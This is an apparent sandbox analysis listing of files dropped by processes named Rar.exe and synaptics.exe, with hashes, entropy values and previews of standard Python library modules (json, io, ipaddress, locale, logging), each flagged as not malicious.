                                                                                                                                                                                                                                  Preview:"""The io module provides the Python interfaces to stream handling. The..builtin open function is defined in this module.....At the top of the I/O hierarchy is the abstract base class IOBase. It..defines the basic interface to a stream. Note, however, that there is no..separation between reading and writing to streams; implementations are..allowed to raise an OSError if they do not support a given operation.....Extending IOBase is RawIOBase which deals simply with the reading and..writing of raw bytes to a stream. FileIO subclasses RawIOBase to provide..an interface to OS files.....BufferedIOBase deals with buffering on a raw byte stream (RawIOBase). Its..subclasses, BufferedWriter, BufferedReader, and BufferedRWPair buffer..streams that are readable, writable, and both respectively...BufferedRandom provides a buffered interface to random access..streams. BytesIO is a simple stream of in-memory bytes.....Another IOBase subclass, TextIOBase, deals with the encoding and decoding..of stre
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):77010
                                                                                                                                                                                                                                  Entropy (8bit):4.541799790471141
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:gmOEpzoz5zCcf6ZQ8kSEtw1M1DGhkaCU7m7F7nKEwXN60wGUrnPpNBwB/FfhOQ3F:p3k92cfn8rB/3UrPStFnzkS4uJiajZ7
                                                                                                                                                                                                                                  MD5:9BE18AFCDD961CC5E3D7595473D3278D
                                                                                                                                                                                                                                  SHA1:7C4DF2C60B087E8F1EBF939DB830314102F55E12
                                                                                                                                                                                                                                  SHA-256:B3B5B18B43472AEC15CE5F18350A2B3F7D1AFBF9D55B8AF865CD62495BCAD0D2
                                                                                                                                                                                                                                  SHA-512:27BE7EE868858B1F69C71383C1CF3060034156E97BE86782EA37E884FF182FB1569CF5F082754B6E308299EBD67F958349E7066D8326EA50B5482636AE755DB9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Copyright 2007 Google Inc...# Licensed to PSF under a Contributor Agreement....."""A fast, lightweight IPv4/IPv6 manipulation library in Python.....This library is used to create/poke/manipulate IPv4 and IPv6 addresses..and networks....."""....__version__ = '1.0'......import functools....IPV4LENGTH = 32..IPV6LENGTH = 128......class AddressValueError(ValueError):.. """A Value Error related to the address."""......class NetmaskValueError(ValueError):.. """A Value Error related to the netmask."""......def ip_address(address):.. """Take an IP string/int and return an object of the correct type..... Args:.. address: A string or integer, the IP address. Either IPv4 or.. IPv6 addresses may be supplied; integers less than 2**32 will.. be considered to be IPv4 by default..... Returns:.. An IPv4Address or IPv6Address object..... Raises:.. ValueError: if the *address* passed isn't either a v4 or a v6.. address.... """.. t
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):14379
                                                                                                                                                                                                                                  Entropy (8bit):4.879440125735685
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:yi/B/vYM/qFHkKzxUrZGabjtH0kSzxUrZGabuZbN92JDRCRtqUmnXRCRtqWAi2K5:yOIzxGwzxFxnWECxECdA
                                                                                                                                                                                                                                  MD5:DB4A220A79A5F826EF36359ED1C50C28
                                                                                                                                                                                                                                  SHA1:1774DC6339A61957AA38AB6A6A25AB6A0B1D9DE4
                                                                                                                                                                                                                                  SHA-256:FEB17670E443E5DB2723F217727DCC5D5E155C40E4E6935B16061C88542F24E7
                                                                                                                                                                                                                                  SHA-512:3A51E599669D4AFC7339EF06C7A3C9889718EE525F019F044672F2A1C7DE6BF98F581AF54B138D0573D2CC9CF660DDBDF81DB9C4516A125F49BE4A147F2F09B6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:r"""JSON (JavaScript Object Notation) <https://json.org> is a subset of..JavaScript syntax (ECMA-262 3rd edition) used as a lightweight data..interchange format.....:mod:`json` exposes an API familiar to users of the standard library..:mod:`marshal` and :mod:`pickle` modules. It is derived from a..version of the externally maintained simplejson library.....Encoding basic Python object hierarchies::.... >>> import json.. >>> json.dumps(['foo', {'bar': ('baz', None, 1.0, 2)}]).. '["foo", {"bar": ["baz", null, 1.0, 2]}]'.. >>> print(json.dumps("\"foo\bar")).. "\"foo\bar".. >>> print(json.dumps('\u1234')).. "\u1234".. >>> print(json.dumps('\\')).. "\\".. >>> print(json.dumps({"c": 0, "b": 0, "a": 0}, sort_keys=True)).. {"a": 0, "b": 0, "c": 0}.. >>> from io import StringIO.. >>> io = StringIO().. >>> json.dump(['streaming API'], io).. >>> io.getvalue().. '["streaming API"]'....Compact encoding::.... >>> import json.. >>> mydict = {'4':
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12275
                                                                                                                                                                                                                                  Entropy (8bit):5.384902524328476
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:gM0k25NKigD6B7+vx1GkRGqb9j4BtKv72vx1GkRGqb4MmQTQOQkQsx1LtbQkQsxz:gM0TNKigBvx99j4n3vxx47OZrXZrb/
                                                                                                                                                                                                                                  MD5:FA7E9058305BC41C39C61C4BB3E3DC63
                                                                                                                                                                                                                                  SHA1:C1F0B756AC02D11D39089C09DF720266F5A8569C
                                                                                                                                                                                                                                  SHA-256:7E0CBD768B76F520A86D4DE76A854F71C888CA76BA4A0008A894D143AB7796E6
                                                                                                                                                                                                                                  SHA-512:6F5B64757AEE6767B17F279B3B7F2E14364F7F6B9E8628FD57EA5D08BA1BC244901FF1550360CF52DCD988AFBFE477E9757B946D0C0F63A05E73256FF95EC6EB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d+8.......................@...s....d.Z.d.Z.g.d...Z.d.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.Z.e.d.d.d.d.d.d.d.d...Z.d.d.d.d.d.d.d.d.d.d...d.d...Z.d.d.d.d.d.d.d.d.d.d...d.d...Z.e.d.d.d...Z.d.d...Z.d.d.d.d.d.d.d...d.d...Z.d.d.d.d.d.d.d...d.d...Z.d.S.).a....JSON (JavaScript Object Notation) <https://json.org> is a subset of.JavaScript syntax (ECMA-262 3rd edition) used as a lightweight data.interchange format...:mod:`json` exposes an API familiar to users of the standard library.:mod:`marshal` and :mod:`pickle` modules. It is derived from a.version of the externally maintained simplejson library...Encoding basic Python object hierarchies::.. >>> import json. >>> json.dumps(['foo', {'bar': ('baz', None, 1.0, 2)}]). '["foo", {"bar": ["baz", null, 1.0, 2]}]'. >>> print(json.dumps("\"foo\bar")). "\"foo\bar". >>> print(json.dumps('\u1234')). "\u1234". >>> print(json.dumps('\\')). "\\". >>> print(json.dumps({"c": 0, "b": 0, "a": 0}, sort_keys=True)). {"
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9777
                                                                                                                                                                                                                                  Entropy (8bit):5.5636759125685105
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:CEe7Hw/ynOu7lf2/K40QuqLpftfgwjF8mbANHFThJt7AeIWE9b9C10:1sHw/yNV2/MQ3htR8muIjV9Ce
                                                                                                                                                                                                                                  MD5:5328D1B75A8D30D1A45C7530FEB28596
                                                                                                                                                                                                                                  SHA1:CD0C4A98D2CE781AAC9347C32C8B0BE395904D09
                                                                                                                                                                                                                                  SHA-256:6BB8F66C6E32D4775A8341B92C920123E9A9DC541438DC5EA6A9BB3C765FBA11
                                                                                                                                                                                                                                  SHA-512:07A4DD7D40331159416ADDC8ED0C944B911117143F5A8127C209FF557A8C4C055EF458D3D29F7F4234D893DD44F621BF6D368FD642B744DE2013215741DFA689
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.2.......................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...z.d.d.l.m.Z...W.n...e.y.......d.Z.Y.n.w.d.d.g.Z.e.j.e.j.B.e.j.B.Z.e.d...Z.e.d...Z.e.d...Z.G.d.d...d.e...Z.e.e.e.d...Z.e...d.e...Z.d.d.d.d.d.d.d.d.d...Z.d.d...Z.d.e.e.j.f.d.d...Z.e.phe.Z.e...d.e...Z.d.Z.d.e.j.e.f.d.d...Z.e.j.e.f.d.d ..Z.G.d!d...d.e...Z.d.S.)"z.Implementation of JSONDecoder......N)...scanner)...scanstring..JSONDecoder..JSONDecodeError..nan..infz.-infc....................@...s ...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.S.).r....a ...Subclass of ValueError with the following additional properties:.. msg: The unformatted error message. doc: The JSON document being parsed. pos: The start index of doc where parsing failed. lineno: The line corresponding to pos. colno: The column corresponding to pos.. c....................C...sb...|...d.d.|...d...}.|.|...d.d.|.....}.d.|.|.|.|.f...}.t...|.|.....|.|._.|.|._.|.|._.|.|._.|.|._.d.S.).N...r.........z.%s: line %d column %d (char %d))...count..rfind..ValueE
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11128
                                                                                                                                                                                                                                  Entropy (8bit):5.497391527911391
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:UqBYTkkgsft4MszI6lxnP14KAZX/WPxDvoLabuHyjnFibetRv4UO4FR0Q:dyDiMUnd4CPxDzbuS7FiTEd
                                                                                                                                                                                                                                  MD5:B8BF4CC43400D88A9B5C03A5AD57F803
                                                                                                                                                                                                                                  SHA1:B4F156276EA59253CE16514F2F643E13A7A38FBD
                                                                                                                                                                                                                                  SHA-256:4536CEEE68F3879C5EED1FA08966E005A63D3059ECE8D09E3BBFF70EFBDFC5CE
                                                                                                                                                                                                                                  SHA-512:767CCEE73C65FA2E1E4E47FF7B1530AFB1C502DF701D83A25E90CA3DE0ECFE81D3F1D5E796FF530D8E653BFB36DB75282B686F3DE2DA3B5DFFD690D4B208CCE2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.@.......................@...s6...d.Z.d.d.l.Z.z.d.d.l.m.Z...W.n...e.y.......d.Z.Y.n.w.z.d.d.l.m.Z...W.n...e.y-......d.Z.Y.n.w.z.d.d.l.m.Z...W.n...e.yA......d.Z.Y.n.w.e...d...Z.e...d...Z.e...d...Z.d.d.d.d.d.d.d.d...Z.e.d...D.].Z.e...e.e...d...e.......q_e.d...Z.d.d...Z.e.pxe.Z.d.d...Z.e.p.e.Z.G.d.d...d.e...Z.e.e.e.e.e.e.e.e e!e.j"f.d.d...Z#d.S.).z.Implementation of JSONEncoder......N)...encode_basestring_ascii)...encode_basestring)...make_encoderz.[\x00-\x1f\\"\b\f\n\r\t]z.([\\"]|[^\ -~])s....[.-.]z.\\z.\"z.\bz.\fz.\nz.\rz.\t)...\.."................ .....\u{0:04x}..infc....................C........d.d...}.d.t...|.|.....d...S.).z5Return a JSON representation of a Python string.. c....................S...s....t.|...d.....S.).Nr....)...ESCAPE_DCT..group)...match..r......C:\Users\Public\M20EKMMEH2\lib\json\encoder.py..replace(...s......z%py_encode_basestring.<locals>.replacer....)...ESCAPE..sub....sr....r....r....r......py_encode_basestring$...s........r....c..................
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1927
                                                                                                                                                                                                                                  Entropy (8bit):5.610481446814692
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:Uwhn/cfelN3xf9oIIv3y1R0vSFkg4VTdOIC54vD:j0MFLIPwETd9CeD
                                                                                                                                                                                                                                  MD5:EB817D1E0C3FA8F004EAB20EFA5F6E8F
                                                                                                                                                                                                                                  SHA1:B7F2B61DF28F23C3BA6D5EC5E347444FBAD29533
                                                                                                                                                                                                                                  SHA-256:360F50253A2FD2C64EB9AC02EF1C910878265044CB5AC21D59E42E99E520A88C
                                                                                                                                                                                                                                  SHA-512:47D9AC8F703AA42AADB9AE631BE7CE3295BC1FF00B3D4A52B9351CB6D36651BAD200A2067FA0345B357F71FACBBB828906BD46BE7F1F086A50CC517337D6CBF8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...sh...d.Z.d.d.l.Z.z.d.d.l.m.Z...W.n...e.y.......d.Z.Y.n.w.d.g.Z.e...d.e.j.e.j.B.e.j.B...Z.d.d...Z.e.p1e.Z.d.S.).z.JSON token scanner......N)...make_scannerr....z)(-?(?:0|[1-9]\d*))(\.\d+)?([eE][-+]?\d+)?c........................sv...|.j...|.j...|.j...t.j...|.j...|.j...|.j...|.j...|.j...|.j...|.j...........................f.d.d.........f.d.d...}.|.S.).Nc........................s....z.|.|...}.W.n...t.y.......t.|...d...w.|.d.k.r...|.|.d.......S.|.d.k.r0..|.|.d...f.............S.|.d.k.r=..|.|.d...f.....S.|.d.k.rQ|.|.|.d.......d.k.rQd.|.d...f.S.|.d.k.re|.|.|.d.......d.k.red.|.d...f.S.|.d.k.ry|.|.|.d.......d.k.ryd.|.d...f.S...|.|...}.|.d.u.r.|.....\.}.}.}.|.s.|.r...|.|.p.d...|.p.d.....}.n...|...}.|.|.....f.S.|.d.k.r.|.|.|.d.......d.k.r...d...|.d...f.S.|.d.k.r.|.|.|.d.......d.k.r..d...|.d...f.S.|.d.k.r.|.|.|.d.......d.k.r..d...|.d...f.S.t.|.....).N..".......{..[..n.....Z.null..t..trueT..f.....Z.falseF....N.......NaN..I.......Infinity..-.....z.-Infinit
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12829
                                                                                                                                                                                                                                  Entropy (8bit):4.602150515729369
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:4LZ5A9dcw1No306qcRvU23OHh7MSUBzBru3Gc5kaXQxzfv4YAimanhXYAxisbPK:4Z5AZq30Nuv4WDK
                                                                                                                                                                                                                                  MD5:5CCA52D21FDD03EBC838040B3B3448A0
                                                                                                                                                                                                                                  SHA1:26EA25AB90B1D325AE65D492944E3757C0A1A4D6
                                                                                                                                                                                                                                  SHA-256:B719FBCFCEBD2B174F076E71292E22B1A17D9E258DBE896C768325383BAD4F80
                                                                                                                                                                                                                                  SHA-512:E21F1F5EF9821DC49A71552D8E3E42DB1D1817A9567C10AEA7764B3143630105570BCBF41A63AEE58B65ED7AC13C77AFC2A16CB46DC236F3529A95D755150D66
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Implementation of JSONDecoder.."""..import re....from json import scanner..try:.. from _json import scanstring as c_scanstring..except ImportError:.. c_scanstring = None....__all__ = ['JSONDecoder', 'JSONDecodeError']....FLAGS = re.VERBOSE | re.MULTILINE | re.DOTALL....NaN = float('nan')..PosInf = float('inf')..NegInf = float('-inf')......class JSONDecodeError(ValueError):.. """Subclass of ValueError with the following additional properties:.... msg: The unformatted error message.. doc: The JSON document being parsed.. pos: The start index of doc where parsing failed.. lineno: The line corresponding to pos.. colno: The column corresponding to pos.... """.. # Note that this exception is used from _json.. def __init__(self, msg, doc, pos):.. lineno = doc.count('\n', 0, pos) + 1.. colno = pos - doc.rfind('\n', 0, pos).. errmsg = '%s: line %d column %d (char %d)' % (msg, lineno, colno, pos).. ValueError.__init__(self, errmsg).
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):16516
                                                                                                                                                                                                                                  Entropy (8bit):4.336988789550011
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:z8MkYik8K5R700myuumc/Wif3vwPQj+xSgy3vYJ54Ivj+xSvxCJ2sa:AY55R7JmyuumKf/pj+xSgy/8Nj+xSvQU
                                                                                                                                                                                                                                  MD5:8385055D886BDB6D7BDE9306262D5771
                                                                                                                                                                                                                                  SHA1:B468DB61686FCCD89829A048979922789E6C223F
                                                                                                                                                                                                                                  SHA-256:E6F0DFDAA65847A24ED293EBC00D273A06862EE36C889C234D5AB3435D4BA364
                                                                                                                                                                                                                                  SHA-512:6184DA762A0A43ECDDF5DEE142AEE374F86B2247C964FD5DF519CB6C82C398B5227315493DF134B14AF82EDC61ECE98FFC0D90CBCDC36278ED953AF4F04B6DBD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Implementation of JSONEncoder.."""..import re....try:.. from _json import encode_basestring_ascii as c_encode_basestring_ascii..except ImportError:.. c_encode_basestring_ascii = None..try:.. from _json import encode_basestring as c_encode_basestring..except ImportError:.. c_encode_basestring = None..try:.. from _json import make_encoder as c_make_encoder..except ImportError:.. c_make_encoder = None....ESCAPE = re.compile(r'[\x00-\x1f\\"\b\f\n\r\t]')..ESCAPE_ASCII = re.compile(r'([\\"]|[^\ -~])')..HAS_UTF8 = re.compile(b'[\x80-\xff]')..ESCAPE_DCT = {.. '\\': '\\\\',.. '"': '\\"',.. '\b': '\\b',.. '\f': '\\f',.. '\n': '\\n',.. '\r': '\\r',.. '\t': '\\t',..}..for i in range(0x20):.. ESCAPE_DCT.setdefault(chr(i), '\\u{0:04x}'.format(i)).. #ESCAPE_DCT.setdefault(chr(i), '\\u%04x' % (i,))....INFINITY = float('inf')....def py_encode_basestring(s):.. """Return a JSON representation of a Python string.... """.. def replace(match):..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2498
                                                                                                                                                                                                                                  Entropy (8bit):4.554490171873137
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:krFYUtdVRojq1j1op2sy5zRwDvAvsCYSl2SOsyV9P:krFJGjcjepJy5zRvkCYSl2SOsyV9P
                                                                                                                                                                                                                                  MD5:83EDC258CA5D89378BC86FE790CBF1B7
                                                                                                                                                                                                                                  SHA1:618A95730FC4AD64ADA9BA39F155B6A873D0447F
                                                                                                                                                                                                                                  SHA-256:9841566FB17315EBDD40A1CA9CB214F02CDE7171B187D4DC821C80120EA853C3
                                                                                                                                                                                                                                  SHA-512:932029300DB3D377BAA4B8003ACB2B76D7F757C02F067B035F4A248A8D2C1FF8E34CB7BBC4E332D354A3ACEF01A4905349F291F7E66774D1F557BA6126A0A225
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""JSON token scanner.."""..import re..try:.. from _json import make_scanner as c_make_scanner..except ImportError:.. c_make_scanner = None....__all__ = ['make_scanner']....NUMBER_RE = re.compile(.. r'(-?(?:0|[1-9]\d*))(\.\d+)?([eE][-+]?\d+)?',.. (re.VERBOSE | re.MULTILINE | re.DOTALL))....def py_make_scanner(context):.. parse_object = context.parse_object.. parse_array = context.parse_array.. parse_string = context.parse_string.. match_number = NUMBER_RE.match.. strict = context.strict.. parse_float = context.parse_float.. parse_int = context.parse_int.. parse_constant = context.parse_constant.. object_hook = context.object_hook.. object_pairs_hook = context.object_pairs_hook.. memo = context.memo.... def _scan_once(string, idx):.. try:.. nextchar = string[idx].. except IndexError:.. raise StopIteration(idx) from None.... if nextchar == '"':.. return parse_string(string, idx + 1, stri
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3424
                                                                                                                                                                                                                                  Entropy (8bit):4.383060644777333
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:pPza+AFS0/LZ3DmLU9k+3W7P/BopadkHqdyf6yAp7zKaz:pP8Fp/F3EU9kV8adkHBf2Is
                                                                                                                                                                                                                                  MD5:04BB41005A34A0439354779391919F36
                                                                                                                                                                                                                                  SHA1:3878CE551869C7CD7A9801CC7E1533D758D73F7D
                                                                                                                                                                                                                                  SHA-256:E4940A58DC30B05A4D66ABCE80C8FF52712BD9EAAAAF50B526ECCB49185950D6
                                                                                                                                                                                                                                  SHA-512:E5ACA0CE7E46F86F678464E2C1AEEDD2B3BC86C98323B362FF02235DC69295001E0B6F7978754A0917AA4640808CB2656FFC64CCA179E88378AE85F2A0E34CD6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:r"""Command-line tool to validate and pretty-print JSON....Usage::.... $ echo '{"json":"obj"}' | python -m json.tool.. {.. "json": "obj".. }.. $ echo '{ 1.2:3.4}' | python -m json.tool.. Expecting property name enclosed in double quotes: line 1 column 3 (char 2)...."""..import argparse..import json..import sys..from pathlib import Path......def main():.. prog = 'python -m json.tool'.. description = ('A simple command line interface for json module '.. 'to validate and pretty-print JSON objects.').. parser = argparse.ArgumentParser(prog=prog, description=description).. parser.add_argument('infile', nargs='?',.. type=argparse.FileType(encoding="utf-8"),.. help='a JSON file to be validated or pretty-printed',.. default=sys.stdin).. parser.add_argument('outfile', nargs='?',.. type=Path,.. help='write the output of infile t
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1124
                                                                                                                                                                                                                                  Entropy (8bit):4.587431451247715
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:1TuAvF8VVC7Ln46q7a/cl6b93h0qkc7mKeWdItSw+9S7e5:1K88VVV8c0qqp7mKr
                                                                                                                                                                                                                                  MD5:DC5106AABD333F8073FFBF67D63F1DEE
                                                                                                                                                                                                                                  SHA1:E203519CCD77F8283E1EA9D069C6E8DE110E31D9
                                                                                                                                                                                                                                  SHA-256:EBD724ED7E01CE97ECB3A6B296001FA4395BB48161658468855B43CFF0E6EEBB
                                                                                                                                                                                                                                  SHA-512:A2817944D4D2FB9EDD2E577FB0D6B93337E1B3F98D31AD157557363146751C4B23174D69C35EE5D292845DEDCD5EF32EEAC52B877D96EB108C819415D5CF300E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Keywords (from "Grammar/python.gram")....This file is automatically generated; please don't muck it up!....To update the symbols in this file, 'cd' to the top directory of..the python source tree and run:.... PYTHONPATH=Tools/peg_generator python3 -m pegen.keywordgen \.. Grammar/python.gram \.. Grammar/Tokens \.. Lib/keyword.py....Alternatively, you can run 'make regen-keyword'..."""....__all__ = ["iskeyword", "issoftkeyword", "kwlist", "softkwlist"]....kwlist = [.. 'False',.. 'None',.. 'True',.. 'and',.. 'as',.. 'assert',.. 'async',.. 'await',.. 'break',.. 'class',.. 'continue',.. 'def',.. 'del',.. 'elif',.. 'else',.. 'except',.. 'finally',.. 'for',.. 'from',.. 'global',.. 'if',.. 'import',.. 'in',.. 'is',.. 'lambda',.. 'nonlocal',.. 'not',.. 'or',.. 'pass',.. 'raise',.. 'return',.. 'try',.. 'while',.. 'with',.. 'yield'..]....softkwlist = [.. '_',..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5872
                                                                                                                                                                                                                                  Entropy (8bit):4.318351105582314
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:459KnwPrY0wNyGv0/lTqhlBI2hgOwTYjbnknCG/l2IhLySDQ/v5R4/yi:Q9KnBg9qh5wTinknCG/1VySDQ/v8/yi
                                                                                                                                                                                                                                  MD5:E54F85B0CA944E38241E4E7322026758
                                                                                                                                                                                                                                  SHA1:55F288E471BB0E2B426F69AAC6F22BCB7A71DADE
                                                                                                                                                                                                                                  SHA-256:9ED3BA77F235C8FCC60D00BD6B9AA9495C717B59C8AC9EFB7C6FFDFE9B82B034
                                                                                                                                                                                                                                  SHA-512:54E47DD813DFEBC5147296E32A445F3A10FB89C48140EB9F5276B7CE564F74DC3955722C340DDA26541495A5B8C658ED70BF74090AAD505654EBFCCFA1246E1F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Cache lines from Python source files.....This is intended to read lines from modules imported -- hence if a filename..is not found, it will look down the module search path for a file by..that name..."""....import functools..import sys..import os..import tokenize....__all__ = ["getline", "clearcache", "checkcache", "lazycache"]......# The cache. Maps filenames to either a thunk which will provide source code,..# or a tuple (size, mtime, lines, fullname) once loaded...cache = {}......def clearcache():.. """Clear the cache entirely.""".. cache.clear()......def getline(filename, lineno, module_globals=None):.. """Get a line for a Python source file from the cache... Update the cache if it doesn't contain an entry for this file already.""".... lines = getlines(filename, module_globals).. if 1 <= lineno <= len(lines):.. return lines[lineno - 1].. return ''......def getlines(filename, module_globals=None):.. """Get the lines for a Python source file from the
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF, CR line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):79885
                                                                                                                                                                                                                                  Entropy (8bit):4.366884409318954
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:KPRttodRiVJ8forhoJiVz3Pu8h+H6IVy7tWYsvqkYV+dOPzwlorNpdADdNZn8VF6:KPRtX9oiukigJsOYZFhr9pUT9FW
                                                                                                                                                                                                                                  MD5:374B0F166F2FC787BC59D71555F62378
                                                                                                                                                                                                                                  SHA1:6DE0DFD89E9F8AAA4E76B3BFED821B3C9C444584
                                                                                                                                                                                                                                  SHA-256:91C791F7C41C23A8C64026A92AB276DE5D3F2F0661430D44596054F40CFFC66B
                                                                                                                                                                                                                                  SHA-512:466A74BEC12122E90708B6118B948D9DC1E33187212E6065FC81AFB004704F68DB03B5EFF2A2294179507D36A7ECDA6B41BDA4EAF9BF07E1B0B29A7A9842FD31
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Locale support module.....The module provides low-level access to the C lib's locale APIs and adds high..level number formatting APIs as well as a locale aliasing engine to complement..these.....The aliasing engine includes support for many commonly used locale names and..maps them to values suitable for passing to the C lib's setlocale() function. It..also includes default encodings for all supported locale names....."""....import sys..import encodings..import encodings.aliases..import re..import _collections_abc..from builtins import str as _builtin_str..import functools....# Try importing the _locale module...#..# If this fails, fall back on a basic 'C' locale emulation.....# Yuck: LC_MESSAGES is non-standard: can't tell whether it exists before..# trying the import. So __all__ is also fiddled at the end of the file...__all__ = ["getlocale", "getdefaultlocale", "getpreferredencoding", "Error",.. "setlocale", "resetlocale", "localeconv", "strcoll", "strxfrm",..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):82493
                                                                                                                                                                                                                                  Entropy (8bit):4.535333444845991
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:TTM4A0scEBFwpxWJvH1LHaCAUSxV37kbGQR6+KVQhb:TTM4V/oNH17aykVLM0qJ
                                                                                                                                                                                                                                  MD5:B8A10CBEDFF425920DC05A5038BA5723
                                                                                                                                                                                                                                  SHA1:D7963C9958397B1AE8377AB8D17A8652CDDE5702
                                                                                                                                                                                                                                  SHA-256:613C94FD78D5C40972F0E6A829C1BAAAA7496B3DE641200FC84970F89DAAA494
                                                                                                                                                                                                                                  SHA-512:CBE3646C50B69A9359BE431BB583E201F02CD850AA7EFFD3AAE1FB190907DBAC63BC43F56805F1D95A90914BAF8828FADEEA4B439860C624514FCAF1AC96B4D6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Copyright 2001-2019 by Vinay Sajip. All Rights Reserved...#..# Permission to use, copy, modify, and distribute this software and its..# documentation for any purpose and without fee is hereby granted,..# provided that the above copyright notice appear in all copies and that..# both that copyright notice and this permission notice appear in..# supporting documentation, and that the name of Vinay Sajip..# not be used in advertising or publicity pertaining to distribution..# of the software without specific, written prior permission...# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING..# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL..# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR..# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER..# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT..# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE..
